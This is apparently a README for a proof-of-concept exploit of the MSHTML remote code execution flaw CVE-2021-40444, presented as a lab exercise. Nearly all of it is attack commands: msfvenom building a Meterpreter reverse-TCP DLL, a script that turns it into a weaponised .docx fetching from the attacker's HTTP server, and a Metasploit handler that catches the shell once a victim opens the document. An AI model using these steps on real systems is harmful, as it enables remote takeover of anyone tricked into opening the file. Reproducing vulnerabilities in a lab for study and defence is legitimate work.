# CVE-2021-40444-POC
An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using Metasploit Framework.

*works best if not run in FlareVM*

Git Clone the repository from

Prepare the `.dll` template to be used later with `msfvenom`

`msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll`

Copy the recently produced `template.dll` into the folder `test/` from the repository
Give executable permission to the `template.dll` by `chmod +x template.dll`

Run the script to use the `template.dll` to be process into `output`
`python3 generate ~/test/template.dll http://<SOURCE IP>`

The document will then be exported into the folder `out/` and we can make a listener in our HTTP Port (Default is 80)
`python3 host 80`

Run metasploit with
`msfconsole -q`
`use multi/handler`
`set payload windows/meterpreter/reverse_tcp`
`set lhost <SOURCE IP>`

Then we can send the `document.docx` to our vulnerable machine and execute the .docx

We will get response in the `` terminal and also the lab is successful if we are able to spawn reverse tcp shell.